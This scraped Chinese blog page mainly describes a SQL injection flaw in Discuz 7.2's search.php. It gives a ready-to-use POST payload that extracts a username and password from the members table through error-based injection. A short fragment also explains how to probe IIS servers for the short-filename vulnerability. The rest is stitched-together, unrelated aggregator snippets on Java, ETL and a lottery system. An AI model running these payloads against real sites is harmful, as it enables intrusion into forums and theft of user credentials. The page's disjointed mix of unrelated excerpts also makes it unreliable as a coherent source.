php discuzSQL注入_Discuz 7.2 /search.php SQL注入漏洞

news/2024/7/8 11:12:12

在文件/include/search_sort.inc.php150行

@include_once DISCUZ_ROOT.'./forumdata/cache/threadsort_'.$selectsortid.'.php';

这个$selectsortid变量没有做过任何处理，而且最后进入到了170行的SQL语句

$query = $db->query("SELECT tid FROM {$tablepre}optionvalue$selectsortid ".($sqlsrch ? 'WHERE '.$sqlsrch : '')."");

导致了SQL注入的产生

漏洞利用过程

1.登陆论坛

2.访问

http://xxxx.com/search.php

post数据:

formhash=1&srchtype=threadsort&st=on&sortid=3&searchsubmit=true&selectsortid=3 where tid =1 and (select 1 from (select count(*),concat((select (select (select concat(username,0x3a,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&srcchtxt=aaa

http://www.niftyadmin.cn/n/2643099.html

php微信抽奖系统源码,微信互动游戏营销活动抽奖系统 v1.1

口号帮微信互动游戏营销活动抽奖DIY在线制作系统,支持微信游戏活动自定义，可以应用微信抽奖活动系统。系统可以自定义游戏名称、奖品、产品核销等功能。v1.11.修复后台数据显示问题2.修复无法删除游戏bug3.增加线下兑奖人员的设置4.增加数据表5.增加日志清理功能6.增…

[转载] 使用Kettle进行数据迁移（ETL）

由于开发新的系统，需要将之前一个老的C/S应用的数据按照新的数据设计导入到新库中。此过程可能涉及到表结构不一致、大数据量（千万级，甚至上亿）等情况，包括异构数据的抽取、清洗等等工作。部分复杂的工作需要我们的DBA…

Java多线程-入门知识

通用知识-名词解释多任务:统一时间可以运行多个任务(应用程序)，但存在并发(同一个CPU上)于并行(多个CPU同时处理)的区别. 进程:进程是线程的容器。是包含程序的指令、数据及其组织形式的描述，进程是程序的实体，保持着当前程序的活动状态。…

equals是判断java原理,Java中equals()与hashCode()的原理与设计

1、何时需要重写equals()当一个类有自己特有的“逻辑相等”概念(不同于对象身份的概念)。2、为什么改写equals()的时候，总是要改写hashCode()两个原则：hashCode()的返回值和equals()的关系如下：如果x.equals(y)返回“true”，那么x…

http://www.xxxx.com/*~1****/a.aspx http://www.xxxx.com/l1j1e*~1****/a.aspx If the first one return an HTTP 404 and the second one return an 400.Your server may be exploitable to this vulnerability. 转载于:https://www.cnblogs.com/goding/p/5546384.html

分析Servlet运行原理

原文链接：http://www.yiidian.com/servlet/servlet-how-work.html 接下来我们有必要了解下Servlet的工作原理，这样才能更好地理解Servlet。本文我们将以之前开发过的Servlet程序来讲解Servlet的内部细节。 1 Servlet基本执行过程 Web容器（…